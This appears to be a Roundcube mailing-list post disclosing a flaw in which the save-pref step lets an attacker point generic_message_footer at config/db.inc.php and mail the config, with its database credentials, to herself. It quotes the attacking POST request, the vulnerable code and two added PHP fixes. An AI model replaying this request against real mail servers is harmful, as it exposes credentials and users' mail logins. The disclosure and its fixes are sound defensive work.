An attacker first changes the value of the user preference generic_message_footer to any file that Roundcube is allowed to read (config/db.inc.php, config/main.inc.php), then sends herself a message (the config file is included as the footer). This allows viewing the session crypto key and the DB user and password. If phpMyAdmin (MySQL) or phpPgAdmin (PostgreSQL) is installed on the hosting and sessions are saved in the DB, the attacker gets users' mail logins and passwords.

Found in a Russian tech blog (http://habrahabr.ru/post/174423/).

------

POST /?_task=settings&_action=save-pref&check_request=&_check_request= HTTP/1.1" 200 1133 "http://mail.ddos-guard.net/?_task=mail"; "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0" "_token=0f7c9ae8a387cb0bc5ce563fa09fe172&_session=generic_message_footer&_name=generic_message_footer&_value=config/db.inc.php


------

index.php:

else if ($RCMAIL->action == 'save-pref') {
 include INSTALL_PATH . 'program/steps/utils/save_pref.inc';
}


------

program/steps/utils/save_pref.inc:

$name = get_input_value('_name', RCUBE_INPUT_POST);
$value = get_input_value('_value', RCUBE_INPUT_POST);

// save preference value
$RCMAIL->user->save_prefs(array($name => $value)); //<--------- rewrites any preference: $name is never checked against an allowlist

// update also session if requested
if ($sessname = get_input_value('_session', RCUBE_INPUT_POST)) {
    // Support multidimensional arrays...
    $vars = explode('/', $sessname);

    // ... up to 3 levels
    if (count($vars) == 1)
        $_SESSION[$vars[0]] = $value;
    else if (count($vars) == 2)
        $_SESSION[$vars[0]][$vars[1]] = $value;
    else if (count($vars) == 3)
        $_SESSION[$vars[0]][$vars[1]][$vars[2]] = $value;
}

$OUTPUT->reset();
$OUTPUT->send();
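Added example (not Roundcube's own code, and not the project's actual fix): a save-pref handler that accepts only preference names and session keys from an explicit allowlist, so a request naming generic_message_footer is rejected before anything is written. The POST parameters _name, _value and _session come from the original save_pref.inc; the function name, the allowlists and the stand-in arrays for save_prefs() and $_SESSION are assumptions.

```php
<?php
// Added example, not code from Roundcube: a save-pref handler that accepts
// preference names and session keys only from an explicit allowlist.
// The POST parameters _name, _value and _session come from the original
// save_pref.inc; every other name below is an assumption.

// Preferences a browser client may change through this step. Server-side
// configuration keys such as generic_message_footer are deliberately absent,
// so a request naming them is rejected before anything is written.
$CLIENT_SETTABLE_PREFS = array(
    'preview_pane',
    'preview_pane_mark_read',
    'list_cols',
    'collapsed_folders',
);

// Session entries the step may mirror, using the "a/b/c" path form of _session.
$CLIENT_SETTABLE_SESSION = array(
    'preview_pane',
    'list_attrib/columns',
);

/**
 * Validate and apply one save-pref request.
 * $prefs stands in for $RCMAIL->user->save_prefs(), $session for $_SESSION.
 * Returns true on success; returns false and writes nothing if any part of
 * the request is rejected.
 */
function handle_save_pref(array $post, array $allowed_prefs, array $allowed_session,
                          array &$prefs, array &$session)
{
    $name     = isset($post['_name'])    ? (string) $post['_name']    : '';
    $value    = isset($post['_value'])   ? (string) $post['_value']   : '';
    $sessname = isset($post['_session']) ? (string) $post['_session'] : '';

    if (!in_array($name, $allowed_prefs, true)) {
        error_log("save-pref rejected: preference '$name' is not client-settable");
        return false;
    }
    if ($sessname !== '' && !in_array($sessname, $allowed_session, true)) {
        error_log("save-pref rejected: session key '$sessname' is not client-settable");
        return false;
    }

    // Both checks passed: persist the preference ...
    $prefs[$name] = $value;

    // ... and mirror it into the session along the allowlisted path.
    if ($sessname !== '') {
        $ref = &$session;
        foreach (explode('/', $sessname) as $key) {
            if (!isset($ref[$key]) || !is_array($ref[$key])) {
                $ref[$key] = array();
            }
            $ref = &$ref[$key];
        }
        $ref = $value;
        unset($ref);
    }
    return true;
}

$prefs   = array();
$session = array();

// The request from the log line in the report: rejected, nothing is stored.
$attack = array(
    '_name'    => 'generic_message_footer',
    '_value'   => 'config/db.inc.php',
    '_session' => 'generic_message_footer',
);
var_dump(handle_save_pref($attack, $CLIENT_SETTABLE_PREFS, $CLIENT_SETTABLE_SESSION, $prefs, $session));

// A legitimate UI preference: accepted and mirrored into the session.
$legit = array('_name' => 'preview_pane', '_value' => '1', '_session' => 'preview_pane');
var_dump(handle_save_pref($legit, $CLIENT_SETTABLE_PREFS, $CLIENT_SETTABLE_SESSION, $prefs, $session));
var_dump($prefs, $session);
```

The point of validating both _name and _session before writing anything is that the original step stores the preference first and only then touches the session, so a partial rejection would still leave the rewritten preference in the user's prefs. The error_log() lines also give an administrator something to alert on: a rejected save-pref naming a config key is a direct signal of this attack being attempted.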

------

program/steps/mail/sendmail.inc

  // generic footer for all messages
  if ($isHtml && !empty($CONFIG['generic_message_footer_html'])) {
    $footer = file_get_contents(realpath($CONFIG['generic_message_footer_html'])); //<----- load file from the path stored in the preference value
    $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset);
  }
  else if (!empty($CONFIG['generic_message_footer'])) {
    $footer = file_get_contents(realpath($CONFIG['generic_message_footer'])); //<----- load file from the path stored in the preference value
    $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset);
    if ($isHtml)
      $footer = '<pre>'.$footer.'</pre>';
  }
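Added example (not Roundcube's own code): a defence-in-depth counterpart to the sendmail.inc code above. Even after save-pref stops accepting generic_message_footer, the footer loader should only read files that resolve inside a directory set aside for footers, so a value like config/db.inc.php can never be included in an outgoing message. The function name, the footer directory and the temporary files it creates for the demonstration are assumptions; only the footer mechanism itself comes from sendmail.inc.

```php
<?php
// Added example, not code from Roundcube. Loads the footer file only when it
// resolves to a regular file strictly inside a dedicated footer directory.
// All names here are assumptions; only the footer mechanism comes from
// sendmail.inc.

/**
 * Return the footer text, or '' if $configured_path does not resolve to a
 * regular file inside $footer_dir.
 */
function load_footer_file($configured_path, $footer_dir)
{
    $base = realpath($footer_dir);
    if ($base === false || $configured_path === '') {
        return '';
    }

    // Relative values are resolved against the footer directory, never
    // against the web application root (where config/ lives).
    $candidate = ($configured_path[0] === DIRECTORY_SEPARATOR)
        ? $configured_path
        : $base . DIRECTORY_SEPARATOR . $configured_path;

    // realpath() collapses "../" and symlinks, so the prefix check below is
    // made against the real location of the file.
    $target = realpath($candidate);
    if ($target === false
        || !is_file($target)
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        error_log("generic_message_footer rejected: '$configured_path' is not inside $base");
        return '';
    }

    return (string) file_get_contents($target);
}

// Constructed demonstration layout (created in the system temp directory):
//   <tmp>/footers/signature.txt   legitimate footer
//   <tmp>/config/db.inc.php       simulated secret that must stay unreadable
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'footer_demo_' . uniqid();
mkdir($tmp . '/footers', 0700, true);
mkdir($tmp . '/config', 0700, true);
file_put_contents($tmp . '/footers/signature.txt', "-- \nSent with Roundcube\n");
file_put_contents($tmp . '/config/db.inc.php', "<?php \$rcmail_config['db_dsnw'] = 'constructed-secret';\n");

$footer_dir = $tmp . '/footers';
var_dump(load_footer_file('signature.txt', $footer_dir));             // legitimate footer
var_dump(load_footer_file('../config/db.inc.php', $footer_dir));      // traversal out of the footer dir
var_dump(load_footer_file($tmp . '/config/db.inc.php', $footer_dir)); // absolute path outside the footer dir

// Clean up the constructed files.
unlink($tmp . '/footers/signature.txt');
unlink($tmp . '/config/db.inc.php');
rmdir($tmp . '/footers');
rmdir($tmp . '/config');
rmdir($tmp);
```

The original code's realpath() call does nothing to restrict where the footer comes from; it only normalises the path. Restriction comes from comparing the normalised result against a trusted base directory, and the trailing DIRECTORY_SEPARATOR in the comparison matters: without it a sibling directory whose name merely starts with the base name (footers-private/) would pass the check.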


--
Sidlyarenko Sergey
https://github.com/lefoyer
_______________________________________________
Roundcube Development discussion mailing list
[email protected]
http://lists.roundcube.net/mailman/listinfo/dev
